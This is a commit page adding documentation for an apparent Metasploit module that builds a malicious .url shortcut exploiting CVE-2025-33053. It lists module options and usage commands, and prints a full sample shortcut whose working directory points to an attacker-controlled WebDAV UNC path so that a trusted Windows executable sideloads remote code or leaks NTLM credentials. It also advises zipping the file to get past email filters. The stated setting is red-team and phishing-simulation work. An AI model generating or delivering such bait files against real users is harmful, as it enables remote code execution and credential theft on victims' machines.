Skip to content

Commit 98389f2

Browse files
committed
Add module documentation for CVE-2025-33053 URL generator
1 parent 1846aca commit 98389f2

File tree

1 file changed

+82
-0
lines changed

1 file changed

+82
-0
lines changed
Lines changed: 82 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,82 @@
1+
## Overview
2+
3+
This module generates a malicious `.url` Internet Shortcut file that abuses CVE-2025-33053 — a vulnerability in how Windows handles `.url` files referencing remote UNC paths (e.g., WebDAV shares).
4+
5+
When the generated `.url` file is opened on a vulnerable Windows machine, it causes the system to connect to the specified UNC path, potentially triggering remote code execution depending on the environment and payload hosted at the target.
6+
7+
The shortcut uses a trusted executable (e.g., iediagcmd.exe) and sets its working directory to a UNC path controlled by the attacker.
8+
9+
## Module Information
10+
11+
**Module Name**: auxiliary/gather/cve_2025_33053
12+
**Authors**:
13+
- DevBuiHieu
14+
15+
**Disclosure Date**: 2025-06-11
16+
**License**: MSF_LICENSE
17+
**Rank**: Normal
18+
19+
## Options
20+
21+
| Name | Required | Description | Default Value |
22+
|-------------|----------|-------------------------------------------------------------------------|---------------------------------------------------------------|
23+
| IP | yes | The attacker IP address or domain used to generate the UNC path | N/A |
24+
| SHARE | no | WebDAV share name used in UNC path | `webdav` |
25+
| OUTFILE | no | Output filename of the generated `.url` file | `bait.url` |
26+
| EXE | no | Trusted executable to trigger (LOLBAS technique) | `C:\Program Files\Internet Explorer\iediagcmd.exe` |
27+
| ICON | no | Icon file shown in `.url` properties | `C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe`|
28+
| INDEX | no | Icon index to use | `13` |
29+
| MODIFIED | no | Timestamp-like hex value for `.url` metadata | `20F06BA06D07BD014D` |
30+
31+
## Scenarios
32+
33+
This module can be used in phishing simulations or red team engagements where you want to:
34+
35+
- Deliver `.url` shortcut files that point to remote UNC WebDAV shares
36+
- Trigger Windows to authenticate to your WebDAV server (NTLM leak)
37+
- Leverage DLL hijacking or EXE sideloading via UNC path
38+
- Test user awareness or email filtering against `.url` payloads
39+
40+
## Example Usage
41+
42+
```
43+
use auxiliary/gather/cve_2025_33053
44+
set IP 192.168.1.100
45+
run
46+
```
47+
48+
Optionally:
49+
50+
```
51+
set SHARE payloads
52+
set EXE "C:\Program Files\Internet Explorer\iediagcmd.exe"
53+
set OUTFILE bait.url
54+
run
55+
```
56+
57+
## Output
58+
59+
Creates a file like:
60+
61+
```
62+
[InternetShortcut]
63+
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
64+
WorkingDirectory=\\192.168.1.100\webdav\
65+
ShowCommand=7
66+
IconIndex=13
67+
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
68+
Modified=20F06BA06D07BD014D
69+
```
70+
71+
## References
72+
73+
- https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
74+
- https://nvd.nist.gov/vuln/detail/CVE-2025-33053
75+
- https://lolbas-project.github.io
76+
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053
77+
78+
## Notes
79+
80+
- WebDAV server must be accessible to the victim (port 80 open)
81+
- Windows Defender or SmartScreen may block behavior in patched systems
82+
- `.url` files may need to be zipped to bypass email filters

0 commit comments

Comments
 (0)